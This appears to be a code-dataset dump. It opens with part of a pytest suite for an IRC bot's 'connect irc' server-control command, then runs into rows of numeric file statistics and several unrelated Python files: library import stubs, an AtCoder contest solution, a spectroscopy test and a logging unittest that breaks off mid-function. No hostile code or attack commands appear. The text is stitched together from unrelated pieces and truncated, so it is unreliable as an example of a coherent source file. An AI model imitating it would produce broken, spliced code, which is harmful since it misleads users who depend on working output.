test_hallo.function_dispatcher.dispatch(
EventMessage(
test_hallo.test_server,
test_hallo.test_chan,
test_hallo.test_user,
"connect irc www.example.com:80 nick=" + test_nick,
)
)
# Ensure correct response
data = test_hallo.test_server.get_send_data(1, test_hallo.test_chan, EventMessage)
assert (
"connected to new irc server" in data[0].text.lower()
), "Incorrect output: " + str(data[0].text)
# Find the right server
assert (
len(test_hallo.server_list) == 2
), "Incorrect number of servers in hallo instance."
right_server = None # type: ServerIRC
for server in test_hallo.server_list:
if server is not test_hallo.test_server:
right_server = server
assert right_server is not None, "New server wasn't found."
assert right_server.nick == test_nick, "Specified nick was not used"
def test_server_prefix_specified_string(hallo_getter):
test_hallo = hallo_getter({"server_control"})
# Set up
test_prefix = "robot"
# Run command
test_hallo.function_dispatcher.dispatch(
EventMessage(
test_hallo.test_server,
test_hallo.test_chan,
test_hallo.test_user,
"connect irc www.example.com:80 prefix=" + test_prefix,
)
)
# Ensure correct response
data = test_hallo.test_server.get_send_data(1, test_hallo.test_chan, EventMessage)
assert (
"connected to new irc server" in data[0].text.lower()
), "Incorrect output: " + str(data[0].text)
# Find the right server
assert (
len(test_hallo.server_list) == 2
), "Incorrect number of servers in hallo instance."
right_server = None # type: ServerIRC
for server in test_hallo.server_list:
if server is not test_hallo.test_server:
right_server = server
assert right_server is not None, "New server wasn't found."
assert right_server.prefix == test_prefix, "Specified prefix was not used"
def test_server_prefix_specified_none(hallo_getter):
test_hallo = hallo_getter({"server_control"})
# Run command
test_hallo.function_dispatcher.dispatch(
EventMessage(
test_hallo.test_server,
test_hallo.test_chan,
test_hallo.test_user,
"connect irc www.example.com:80 prefix=none",
)
)
# Ensure correct response
data = test_hallo.test_server.get_send_data(1, test_hallo.test_chan, EventMessage)
assert (
"connected to new irc server" in data[0].text.lower()
), "Incorrect output: " + str(data[0].text)
# Find the right server
assert (
len(test_hallo.server_list) == 2
), "Incorrect number of servers in hallo instance."
right_server = None # type: ServerIRC
for server in test_hallo.server_list:
if server is not test_hallo.test_server:
right_server = server
assert right_server is not None, "New server wasn't found."
assert right_server.prefix is None, "Prefix wasn't set to None as specified"
def test_server_prefix_inherit_string(hallo_getter):
test_hallo = hallo_getter({"server_control"})
# Set up
test_prefix = "robot"
test_hallo.test_server.prefix = test_prefix
# Run command
test_hallo.function_dispatcher.dispatch(
EventMessage(
test_hallo.test_server,
test_hallo.test_chan,
test_hallo.test_user,
test_prefix + " connect irc www.example.com:80",
)
)
# Ensure correct response
data = test_hallo.test_server.get_send_data(1, test_hallo.test_chan, EventMessage)
assert (
"connected to new irc server" in data[0].text.lower()
), "Incorrect output: " + str(data[0].text)
# Find the right server
assert (
len(test_hallo.server_list) == 2
), "Incorrect number of servers in hallo instance."
right_server = None # type: ServerIRC
for server in test_hallo.server_list:
if server is not test_hallo.test_server:
right_server = server
assert right_server is not None, "New server wasn't found."
assert right_server.prefix == test_prefix, "Inherited prefix was not used"
def test_server_prefix_inherit_none(hallo_getter):
test_hallo = hallo_getter({"server_control"})
# Set up
test_hallo.test_server.prefix = None
test_hallo.default_prefix = ""
# Run command
test_hallo.function_dispatcher.dispatch(
EventMessage(
test_hallo.test_server,
test_hallo.test_chan,
test_hallo.test_user,
"connect irc www.example.com:80",
)
)
# Ensure correct response
data = test_hallo.test_server.get_send_data(1, test_hallo.test_chan, EventMessage)
assert (
"connected to new irc server" in data[0].text.lower()
), "Incorrect output: " + str(data[0].text)
# Find the right server
assert (
len(test_hallo.server_list) == 2
), "Incorrect number of servers in hallo instance."
right_server = None # type: ServerIRC
for server in test_hallo.server_list:
if server is not test_hallo.test_server:
right_server = server
assert right_server is not None, "New server wasn't found."
assert right_server.prefix is None, "Prefix wasn't inherited as None"
def test_full_name_specified_string(hallo_getter):
test_hallo = hallo_getter({"server_control"})
# Set up
test_name = "Hallo_Robot"
# Run command
test_hallo.function_dispatcher.dispatch(
EventMessage(
test_hallo.test_server,
test_hallo.test_chan,
test_hallo.test_user,
"connect irc www.example.com:80 full_name=" + test_name,
)
)
# Ensure correct response
data = test_hallo.test_server.get_send_data(1, test_hallo.test_chan, EventMessage)
assert (
"connected to new irc server" in data[0].text.lower()
), "Incorrect output: " + str(data[0].text)
# Find the right server
assert (
len(test_hallo.server_list) == 2
), "Incorrect number of servers in hallo instance."
right_server = None # type: ServerIRC
for server in test_hallo.server_list:
if server is not test_hallo.test_server:
right_server = server
assert right_server is not None, "New server wasn't found."
assert right_server.full_name == test_name, "Specified full name was not used"
def test_full_name_inherit_string(hallo_getter):
test_hallo = hallo_getter({"server_control"})
# Set up
test_name = "Hallo_Robot"
test_hallo.test_server.full_name = test_name
# Run command
test_hallo.function_dispatcher.dispatch(
EventMessage(
test_hallo.test_server,
test_hallo.test_chan,
test_hallo.test_user,
"connect irc www.example.com:80",
)
)
# Ensure correct response
data = test_hallo.test_server.get_send_data(1, test_hallo.test_chan, EventMessage)
assert (
"connected to new irc server" in data[0].text.lower()
), "Incorrect output: " + str(data[0].text)
# Find the right server
assert (
len(test_hallo.server_list) == 2
), "Incorrect number of servers in hallo instance."
right_server = None # type: ServerIRC
for server in test_hallo.server_list:
if server is not test_hallo.test_server:
right_server = server
assert right_server is not None, "New server wasn't found."
assert right_server.full_name == test_name, "Inherited full name was not used"
def test_nickserv_nick_default(hallo_getter):
test_hallo = hallo_getter({"server_control"})
# Run command
test_hallo.function_dispatcher.dispatch(
EventMessage(
test_hallo.test_server,
test_hallo.test_chan,
test_hallo.test_user,
"connect irc www.example.com:80",
)
)
# Ensure correct response
data = test_hallo.test_server.get_send_data(1, test_hallo.test_chan, EventMessage)
assert (
"connected to new irc server" in data[0].text.lower()
), "Incorrect output: " + str(data[0].text)
# Find the right server
assert (
len(test_hallo.server_list) == 2
), "Incorrect number of servers in hallo instance."
right_server = None # type: ServerIRC
for server in test_hallo.server_list:
if server is not test_hallo.test_server:
right_server = server
assert right_server is not None, "New server wasn't found."
assert (
right_server.nickserv_nick == "nickserv"
), "Default nickserv nick incorrect"
def test_nickserv_nick_inherit(hallo_getter):
test_hallo = hallo_getter({"server_control"})
# Set up
test_nickserv_name = "nameserv"
test_serv_irc = ServerIRC(test_hallo)
test_serv_irc.prefix = ""
test_serv_irc.name = "test_serv_irc"
test_serv_irc.nickserv_nick = test_nickserv_name
test_chan_irc = test_serv_irc.get_channel_by_address(
"test_chan".lower(), "test_chan"
)
test_user_irc = test_serv_irc.get_user_by_address(
"test_user".lower(), "test_user"
)
# Run command
test_hallo.function_dispatcher.dispatch(
EventMessage(
test_serv_irc,
test_chan_irc,
test_user_irc,
"connect irc example.com:80",
)
)
# Can't check response because I'm using a ServerIRC instead of a ServerMock
# Find the right server
assert (
len(test_hallo.server_list) == 2
), "Incorrect number of servers in hallo instance."
right_server = None # type: ServerIRC
for server in test_hallo.server_list:
if server is not test_hallo.test_server:
right_server = server
assert right_server is not None, "New server wasn't found."
assert (
right_server.nickserv_nick == test_nickserv_name
), "Nickserv nick wasn't inherited"
def test_nickserv_nick_specify(hallo_getter):
test_hallo = hallo_getter({"server_control"})
# Set up
test_nickserv_name = "nameserv"
# Run command
test_hallo.function_dispatcher.dispatch(
EventMessage(
test_hallo.test_server,
test_hallo.test_chan,
test_hallo.test_user,
"connect irc www.example.com:80 nickserv_nick=" + test_nickserv_name,
)
)
# Ensure correct response
data = test_hallo.test_server.get_send_data(1, test_hallo.test_chan, EventMessage)
assert (
"connected to new irc server" in data[0].text.lower()
), "Incorrect output: " + str(data[0].text)
# Find the right server
assert (
len(test_hallo.server_list) == 2
), "Incorrect number of servers in hallo instance."
right_server = None # type: ServerIRC
for server in test_hallo.server_list:
if server is not test_hallo.test_server:
right_server = server
assert right_server is not None, "New server wasn't found."
assert (
right_server.nickserv_nick == test_nickserv_name
), "Specified nickserv nick wasn't set"
def test_nickserv_identity_command_default(hallo_getter):
test_hallo = hallo_getter({"server_control"})
# Run command
test_hallo.function_dispatcher.dispatch(
EventMessage(
test_hallo.test_server,
test_hallo.test_chan,
test_hallo.test_user,
"connect irc www.example.com:80",
)
)
# Ensure correct response
data = test_hallo.test_server.get_send_data(1, test_hallo.test_chan, EventMessage)
assert (
"connected to new irc server" in data[0].text.lower()
), "Incorrect output: " + str(data[0].text)
# Find the right server
assert (
len(test_hallo.server_list) == 2
), "Incorrect number of servers in hallo instance."
right_server = None # type: ServerIRC
for server in test_hallo.server_list:
if server is not test_hallo.test_server:
right_server = server
assert right_server is not None, "New server wasn't found."
assert (
right_server.nickserv_ident_command == "status"
), "Default nickserv identity command incorrect"
def test_nickserv_identity_command_inherit(hallo_getter):
test_hallo = hallo_getter({"server_control"})
# Set up
test_nickserv_command = "identity"
test_serv_irc = ServerIRC(test_hallo)
test_serv_irc.prefix = ""
test_serv_irc.name = "test_serv_irc"
test_serv_irc.nickserv_ident_command = test_nickserv_command
test_chan_irc = test_serv_irc.get_channel_by_address(
"test_chan".lower(), "test_chan"
)
test_user_irc = test_serv_irc.get_user_by_address(
"test_user".lower(), "test_user"
)
# Run command
test_hallo.function_dispatcher.dispatch(
EventMessage(
test_serv_irc,
test_chan_irc,
test_user_irc,
"connect irc example.com:80",
)
)
# Can't check response because I'm using a ServerIRC instead of a ServerMock
# Find the right server
assert (
len(test_hallo.server_list) == 2
), "Incorrect number of servers in hallo instance."
right_server = None # type: ServerIRC
for server in test_hallo.server_list:
if server is not test_hallo.test_server:
right_server = server
assert right_server is not None, "New server wasn't found."
assert (
right_server.nickserv_ident_command == test_nickserv_command
), "Nickserv identity command wasn't inherited"
def test_nickserv_identity_command_specify(hallo_getter):
test_hallo = hallo_getter({"server_control"})
# Set up
test_nickserv_command = "identity"
# Run command
test_hallo.function_dispatcher.dispatch(
EventMessage(
test_hallo.test_server,
test_hallo.test_chan,
test_hallo.test_user,
"connect irc www.example.com:80 nickserv_identity_command="
+ test_nickserv_command,
)
)
# Ensure correct response
data = test_hallo.test_server.get_send_data(1, test_hallo.test_chan, EventMessage)
assert (
"connected to new irc server" in data[0].text.lower()
), "Incorrect output: " + str(data[0].text)
# Find the right server
assert (
len(test_hallo.server_list) == 2
), "Incorrect number of servers in hallo instance."
right_server = None # type: ServerIRC
for server in test_hallo.server_list:
if server is not test_hallo.test_server:
right_server = server
assert right_server is not None, "New server wasn't found."
assert (
right_server.nickserv_ident_command == test_nickserv_command
), "Specified nickserv identity command wasn't set"
def test_nickserv_identity_resp_default(hallo_getter):
test_hallo = hallo_getter({"server_control"})
# Run command
test_hallo.function_dispatcher.dispatch(
EventMessage(
test_hallo.test_server,
test_hallo.test_chan,
test_hallo.test_user,
"connect irc www.example.com:80",
)
)
# Ensure correct response
data = test_hallo.test_server.get_send_data(1, test_hallo.test_chan, EventMessage)
assert (
"connected to new irc server" in data[0].text.lower()
), "Incorrect output: " + str(data[0].text)
# Find the right server
assert (
len(test_hallo.server_list) == 2
), "Incorrect number of servers in hallo instance."
right_server = None # type: ServerIRC
for server in test_hallo.server_list:
if server is not test_hallo.test_server:
right_server = server
assert right_server is not None, "New server wasn't found."
assert (
right_server.nickserv_ident_response == "^status [^ ]+ 3$"
), "Default nickserv identity response incorrect"
def test_nickserv_identity_response_inherit(hallo_getter):
test_hallo = hallo_getter({"server_control"})
# Set up
test_nickserv_response = "identity"
test_serv_irc = ServerIRC(test_hallo)
test_serv_irc.prefix = ""
test_serv_irc.name = "test_serv_irc"
test_serv_irc.nickserv_ident_response = test_nickserv_response
test_chan_irc = test_serv_irc.get_channel_by_address(
"test_chan".lower(), "test_chan"
)
test_user_irc = test_serv_irc.get_user_by_address(
"test_user".lower(), "test_user"
)
# Run command
test_hallo.function_dispatcher.dispatch(
EventMessage(
test_serv_irc,
test_chan_irc,
test_user_irc,
"connect irc example.com:80",
)
)
# Can't check response because I'm using a ServerIRC instead of a ServerMock
# Find the right server
assert (
len(test_hallo.server_list) == 2
), "Incorrect number of servers in hallo instance."
right_server = None # type: ServerIRC
for server in test_hallo.server_list:
if server is not test_hallo.test_server:
right_server = server
assert right_server is not None, "New server wasn't found."
assert (
right_server.nickserv_ident_response == test_nickserv_response
), "Nickserv identity response wasn't inherited"
def test_nickserv_identity_response_specify(hallo_getter):
test_hallo = hallo_getter({"server_control"})
# Set up
test_nickserv_response = "identity"
# Run command
test_hallo.function_dispatcher.dispatch(
EventMessage(
test_hallo.test_server,
test_hallo.test_chan,
test_hallo.test_user,
"connect irc www.example.com:80 nickserv_identity_resp="
+ test_nickserv_response,
)
)
# Ensure correct response
data = test_hallo.test_server.get_send_data(1, test_hallo.test_chan, EventMessage)
assert (
"connected to new irc server" in data[0].text.lower()
), "Incorrect output: " + str(data[0].text)
# Find the right server
assert (
len(test_hallo.server_list) == 2
), "Incorrect number of servers in hallo instance."
right_server = None # type: ServerIRC
for server in test_hallo.server_list:
if server is not test_hallo.test_server:
right_server = server
assert right_server is not None, "New server wasn't found."
assert (
right_server.nickserv_ident_response == test_nickserv_response
), "Specified nickserv identity response wasn't set"
def test_nickserv_password_default(hallo_getter):
test_hallo = hallo_getter({"server_control"})
# Run command
test_hallo.function_dispatcher.dispatch(
EventMessage(
test_hallo.test_server,
test_hallo.test_chan,
test_hallo.test_user,
"connect irc www.example.com:80",
)
)
# Ensure correct response
data = test_hallo.test_server.get_send_data(1, test_hallo.test_chan, EventMessage)
assert (
"connected to new irc server" in data[0].text.lower()
), "Incorrect output: " + str(data[0].text)
# Find the right server
assert (
len(test_hallo.server_list) == 2
), "Incorrect number of servers in hallo instance."
right_server = None # type: ServerIRC
for server in test_hallo.server_list:
if server is not test_hallo.test_server:
right_server = server
assert right_server is not None, "New server wasn't found."
assert right_server.nickserv_pass is None, "Default nickserv password incorrect"
def test_nickserv_password_inherit(hallo_getter):
test_hallo = hallo_getter({"server_control"})
# Set up
test_nickserv_pass = "hunter2"
test_serv_irc = ServerIRC(test_hallo)
test_serv_irc.prefix = ""
test_serv_irc.name = "test_serv_irc"
test_serv_irc.nickserv_pass = test_nickserv_pass
test_chan_irc = test_serv_irc.get_channel_by_address(
"test_chan".lower(), "test_chan"
)
test_user_irc = test_serv_irc.get_user_by_address(
"test_user".lower(), "test_user"
)
# Run command
test_hallo.function_dispatcher.dispatch(
EventMessage(
test_serv_irc,
test_chan_irc,
test_user_irc,
"connect irc example.com:80",
)
)
# Can't check response because I'm using a ServerIRC instead of a ServerMock
# Find the right server
assert (
len(test_hallo.server_list) == 2
), "Incorrect number of servers in hallo instance."
right_server = None # type: ServerIRC
for server in test_hallo.server_list:
if server is not test_hallo.test_server:
right_server = server
assert right_server is not None, "New server wasn't found."
assert (
right_server.nickserv_pass == test_nickserv_pass
), "Nickserv password wasn't inherited"
def test_nickserv_password_specify(hallo_getter):
test_hallo = hallo_getter({"server_control"})
# Set up
test_nickserv_pass = "hunter2"
# Run command
test_hallo.function_dispatcher.dispatch(
EventMessage(
test_hallo.test_server,
test_hallo.test_chan,
test_hallo.test_user,
"connect irc www.example.com:80 nickserv_password="
+ test_nickserv_pass,
)
)
# Ensure correct response
data = test_hallo.test_server.get_send_data(1, test_hallo.test_chan, EventMessage)
assert (
"connected to new irc server" in data[0].text.lower()
), "Incorrect output: " + str(data[0].text)
# Find the right server
assert (
len(test_hallo.server_list) == 2
), "Incorrect number of servers in hallo instance."
right_server = None # type: ServerIRC
for server in test_hallo.server_list:
if server is not test_hallo.test_server:
right_server = server
assert right_server is not None, "New server wasn't found."
assert (
right_server.nickserv_pass == test_nickserv_pass
), "Specified nickserv password wasn't set"
def test_inherit_user_groups_default(hallo_getter):
test_hallo = hallo_getter({"server_control"})
# Set up
test_user_group = UserGroup("test_group", test_hallo)
test_hallo.test_user.add_user_group(test_user_group)
# Run command
test_hallo.function_dispatcher.dispatch(
EventMessage(
test_hallo.test_server,
test_hallo.test_chan,
test_hallo.test_user,
"connect irc www.example.com:80",
)
)
# Ensure correct response
data = test_hallo.test_server.get_send_data(1, test_hallo.test_chan, EventMessage)
assert (
"connected to new irc server" in data[0].text.lower()
), "Incorrect output: " + str(data[0].text)
# Find the right server
assert (
len(test_hallo.server_list) == 2
), "Incorrect number of servers in hallo instance."
right_server = None # type: ServerIRC
for server in test_hallo.server_list:
if server is not test_hallo.test_server:
right_server = server
assert right_server is not None, "New server wasn't found."
# Check user groups
new_user = right_server.get_user_by_address(
test_hallo.test_user.address, test_hallo.test_user.name
)
assert test_user_group in new_user.user_group_list
def test_inherit_user_groups_specify_nick(hallo_getter):
test_hallo = hallo_getter({"server_control"})
# Set up
test_user = "AzureDiamond"
test_user_group = UserGroup("test_group", test_hallo)
test_hallo.test_user.add_user_group(test_user_group)
# Run command
test_hallo.function_dispatcher.dispatch(
EventMessage(
test_hallo.test_server,
test_hallo.test_chan,
test_hallo.test_user,
"connect irc www.example.com:80 god=" + test_user,
)
)
# Ensure correct response
data = test_hallo.test_server.get_send_data(1, test_hallo.test_chan, EventMessage)
assert (
"connected to new irc server" in data[0].text.lower()
), "Incorrect output: " + str(data[0].text)
# Find the right server
assert (
len(test_hallo.server_list) == 2
), "Incorrect number of servers in hallo instance."
right_server = None # type: ServerIRC
for server in test_hallo.server_list:
if server is not test_hallo.test_server:
right_server = server
assert right_server is not None, "New server wasn't found."
# Check user groups
new_user = right_server.get_user_by_address(test_user.lower(), test_user)
assert test_user_group in new_user.user_group_list
def test_server_added(hallo_getter):
test_hallo = hallo_getter({"server_control"})
# Pre flight check
assert len(test_hallo.server_list) == 1, "Too many servers when starting test."
# Run command
test_hallo.function_dispatcher.dispatch(
EventMessage(
test_hallo.test_server,
test_hallo.test_chan,
test_hallo.test_user,
"connect irc www.example.com:80",
)
)
# Ensure correct response
data = test_hallo.test_server.get_send_data(1, test_hallo.test_chan, EventMessage)
assert (
"connected to new irc server" in data[0].text.lower()
), "Incorrect output: " + str(data[0].text)
# Find the right server
assert (
len(test_hallo.server_list) == 2
), "Incorrect number of servers in hallo instance."
right_server = None # type: ServerIRC
for server in test_hallo.server_list:
if server is not test_hallo.test_server:
right_server = server
assert right_server is not None, "New server wasn't found."
def test_thread_started(hallo_getter):
test_hallo = hallo_getter({"server_control"})
# Pre flight calc
thread_count = threading.active_count()
# Run command
test_hallo.function_dispatcher.dispatch(
EventMessage(
test_hallo.test_server,
test_hallo.test_chan,
test_hallo.test_user,
"connect irc www.example.com:80",
)
)
# Ensure correct response
data = test_hallo.test_server.get_send_data(1, test_hallo.test_chan, EventMessage)
assert (
"connected to new irc server" in data[0].text.lower()
), "Incorrect output: " + str(data[0].text)
# Find the right server
assert (
len(test_hallo.server_list) == 2
), "Incorrect number of servers in hallo instance."
right_server = None # type: ServerIRC
for server in test_hallo.server_list:
if server is not test_hallo.test_server:
right_server = server
assert right_server is not None, "New server wasn't found."
# Ensure thread count is up
assert (
threading.active_count() == thread_count + 1
), "Incorrect number of running threads."
def test_server_started(hallo_getter):
test_hallo = hallo_getter({"server_control"})
# Run command
test_hallo.function_dispatcher.dispatch(
EventMessage(
test_hallo.test_server,
test_hallo.test_chan,
test_hallo.test_user,
"connect irc www.example.com:80",
)
)
# Ensure correct response
data = test_hallo.test_server.get_send_data(1, test_hallo.test_chan, EventMessage)
assert (
"connected to new irc server" in data[0].text.lower()
), "Incorrect output: " + str(data[0].text)
# Find the right server
assert (
len(test_hallo.server_list) == 2
), "Incorrect number of servers in hallo instance."
right_server = None # type: ServerIRC
for server in test_hallo.server_list:
if server is not test_hallo.test_server:
right_server = server
assert right_server is not None, "New server wasn't found."
# Ensure new server is started
assert right_server.state != Server.STATE_CLOSED, "New server was not started."
| 36.732989 | 103 | 0.66347 | 5,569 | 42,647 | 4.811995 | 0.026935 | 0.122248 | 0.104784 | 0.074446 | 0.945854 | 0.928614 | 0.920554 | 0.913613 | 0.908389 | 0.904918 | 0 | 0.006709 | 0.252069 | 42,647 | 1,160 | 104 | 36.764655 | 0.833433 | 0.075504 | 0 | 0.775899 | 0 | 0 | 0.188618 | 0.001248 | 0 | 0 | 0 | 0 | 0.150106 | 1 | 0.040169 | false | 0.013742 | 0.005285 | 0 | 0.045455 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
563e53b48146e3faea7d288d0ed69b660c57c9e5 | 170 | py | Python | src/UQpy/utilities/distances/__init__.py | SURGroup/UncertaintyQuantification | a94c8db47d07134ea2b3b0a3ca53ca818532c3e6 | [
"MIT"
] | null | null | null | src/UQpy/utilities/distances/__init__.py | SURGroup/UncertaintyQuantification | a94c8db47d07134ea2b3b0a3ca53ca818532c3e6 | [
"MIT"
] | null | null | null | src/UQpy/utilities/distances/__init__.py | SURGroup/UncertaintyQuantification | a94c8db47d07134ea2b3b0a3ca53ca818532c3e6 | [
"MIT"
] | null | null | null | from UQpy.utilities.distances.baseclass import *
from UQpy.utilities.distances.euclidean_distances import *
from UQpy.utilities.distances.grassmannian_distances import *
| 42.5 | 61 | 0.858824 | 20 | 170 | 7.2 | 0.4 | 0.166667 | 0.354167 | 0.541667 | 0.444444 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.070588 | 170 | 3 | 62 | 56.666667 | 0.911392 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
566fb9046a904e401812b9dbccf3266b3850b113 | 184 | py | Python | viper/modules/pdftools/__init__.py | Mario-Kart-Felix/mal-scrap | bc396a15ea5b144eb1c0f05759d1f9419d6671df | [
"BSD-3-Clause"
] | null | null | null | viper/modules/pdftools/__init__.py | Mario-Kart-Felix/mal-scrap | bc396a15ea5b144eb1c0f05759d1f9419d6671df | [
"BSD-3-Clause"
] | null | null | null | viper/modules/pdftools/__init__.py | Mario-Kart-Felix/mal-scrap | bc396a15ea5b144eb1c0f05759d1f9419d6671df | [
"BSD-3-Clause"
] | null | null | null | from .pdf_parser import cPDFParser, PDF_ELEMENT_COMMENT, PDF_ELEMENT_INDIRECT_OBJECT, PDF_ELEMENT_XREF, PDF_ELEMENT_TRAILER, PDF_ELEMENT_STARTXREF, PDF_ELEMENT_MALFORMED, FormatOutput
| 92 | 183 | 0.896739 | 25 | 184 | 6.04 | 0.56 | 0.397351 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.059783 | 184 | 1 | 184 | 184 | 0.872832 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
8eae096a9d6442105cddc1781237d27696c26fc1 | 1,316 | py | Python | abc205/abc205_c.py | Vermee81/practice-coding-contests | 78aada60fa75f208ee0eef337b33b27b1c260d18 | [
"MIT"
] | null | null | null | abc205/abc205_c.py | Vermee81/practice-coding-contests | 78aada60fa75f208ee0eef337b33b27b1c260d18 | [
"MIT"
] | null | null | null | abc205/abc205_c.py | Vermee81/practice-coding-contests | 78aada60fa75f208ee0eef337b33b27b1c260d18 | [
"MIT"
] | null | null | null | # https://atcoder.jp/contests/abc205/tasks/abc205_c
A, B, C = map(int, input().split())
if A > 0 and B > 0:
if A > B:
print('>')
exit()
if A < B:
print('<')
exit()
if A < 0 and B < 0:
if C % 2 == 0:
if A > B:
print('>')
exit()
if A < B:
print('<')
exit()
if A > B:
print('<')
exit()
if A < B:
print('>')
exit()
if A < 0 < B:
if C % 2 == 0:
if abs(A) > B:
print('>')
exit()
if abs(A) < B:
print('<')
exit()
if C % 2 != 0:
print('<')
exit()
if B < 0 < A:
if C % 2 == 0:
if A > abs(B):
print('>')
exit()
if A < abs(B):
print('<')
exit()
if C % 2 != 0:
print('>')
exit()
if A == 0:
if B < 0:
if C % 2 == 0:
print('<')
exit()
if C % 2 != 0:
print('>')
exit()
if B > 0:
print('<')
exit()
if B == 0:
if A < 0:
if C % 2 == 0:
print('>')
exit()
if C % 2 != 0:
print('<')
exit()
if A > 0:
print('>')
exit()
print('=')
| 17.090909 | 51 | 0.285714 | 160 | 1,316 | 2.34375 | 0.125 | 0.432 | 0.498667 | 0.32 | 0.786667 | 0.773333 | 0.717333 | 0.56 | 0.56 | 0.56 | 0 | 0.058347 | 0.531155 | 1,316 | 76 | 52 | 17.315789 | 0.549433 | 0.037234 | 0 | 0.761194 | 0 | 0 | 0.01502 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 0.283582 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
d92e1b1be8eacae36f325ea58cc1e96bd7cfd320 | 180 | py | Python | tests/utils/recexomol_test.py | dcmvdbekerom/exojax | 9b9305f8e383c73bdb97c1cfb0e276ddafcd75de | [
"MIT"
] | null | null | null | tests/utils/recexomol_test.py | dcmvdbekerom/exojax | 9b9305f8e383c73bdb97c1cfb0e276ddafcd75de | [
"MIT"
] | null | null | null | tests/utils/recexomol_test.py | dcmvdbekerom/exojax | 9b9305f8e383c73bdb97c1cfb0e276ddafcd75de | [
"MIT"
] | null | null | null | import pytest
from exojax.utils.recexomol import get_exomol_database_list
def test_get_recexomol():
db, db0=get_exomol_database_list("CO", "12C-16O")
assert db0=="Li2015"
| 25.714286 | 59 | 0.772222 | 27 | 180 | 4.851852 | 0.703704 | 0.137405 | 0.259542 | 0.320611 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.063291 | 0.122222 | 180 | 6 | 60 | 30 | 0.765823 | 0 | 0 | 0 | 0 | 0 | 0.083333 | 0 | 0 | 0 | 0 | 0 | 0.2 | 1 | 0.2 | true | 0 | 0.4 | 0 | 0.6 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
d9459a9da9e51691e160f9c0aac0d317a0858444 | 7,494 | py | Python | client/logging_test.py | lvzheqi/StreamingEventCompliance | 3a9470f9b0b670c814864369f22e1f1eacef7bad | [
"BSD-2-Clause"
] | 3 | 2018-10-16T15:14:41.000Z | 2019-09-04T09:38:55.000Z | client/logging_test.py | lvzheqi/StreamingEventCompliance | 3a9470f9b0b670c814864369f22e1f1eacef7bad | [
"BSD-2-Clause"
] | 2 | 2021-03-31T19:00:14.000Z | 2021-12-13T19:51:46.000Z | client/logging_test.py | lvzheqi/StreamingEventCompliance | 3a9470f9b0b670c814864369f22e1f1eacef7bad | [
"BSD-2-Clause"
] | 2 | 2018-10-16T15:14:43.000Z | 2019-12-16T13:58:28.000Z | import unittest
from simulate_stream_event.client_logging import ClientLogging
from simulate_stream_event.config import CLIENT_LOG_PATH
import sys
class TestClientLogging(unittest.TestCase):
def test_log_info_2(self):
func_name = sys._getframe().f_code.co_name
test_data_in_log_file = ''
compare_test_data_in_log_file = "INFO Username:Unknown test_log_info_2 'Testing logging info with 2 arguments'"
ClientLogging().log_info(func_name, "Testing logging info with 2 arguments")
with open(CLIENT_LOG_PATH, 'r') as f:
lines = f.read().splitlines()
test_data_in_log_file = lines[-1]
test_data_in_log_file = ' '.join(test_data_in_log_file.split(' ')[3:])
print(test_data_in_log_file)
print(compare_test_data_in_log_file)
self.assertEqual(test_data_in_log_file, compare_test_data_in_log_file)
def test_log_info_3(self):
func_name = sys._getframe().f_code.co_name
uuid = 'test_user'
test_data_in_log_file = ''
compare_test_data_in_log_file = "INFO test_user test_log_info_3 'Testing logging info with 3 arguments'"
ClientLogging().log_info(func_name, uuid, "Testing logging info with 3 arguments")
with open(CLIENT_LOG_PATH, 'r') as f:
lines = f.read().splitlines()
test_data_in_log_file = lines[-1]
test_data_in_log_file = ' '.join(test_data_in_log_file.split(' ')[3:])
print(test_data_in_log_file)
print(compare_test_data_in_log_file)
self.assertEqual(test_data_in_log_file, compare_test_data_in_log_file)
def test_log_info_5(self):
func_name = sys._getframe().f_code.co_name
uuid = 'test_user'
dic = {
'case_id': 'test1',
'activity': 'testing_log_info_5',
}
test_data_in_log_file = ''
compare_test_data_in_log_file = "INFO test_user test_log_info_5 Case_id:test1 Activity:testing_log_info_5 " \
"'Testing logging info with 5 arguments'"
ClientLogging().log_info(func_name, uuid, dic['case_id'], dic['activity'], "Testing logging info with 5 "
"arguments")
with open(CLIENT_LOG_PATH, 'r') as f:
lines = f.read().splitlines()
test_data_in_log_file = lines[-1]
test_data_in_log_file = ' '.join(test_data_in_log_file.split(' ')[3:])
print(test_data_in_log_file)
print(compare_test_data_in_log_file)
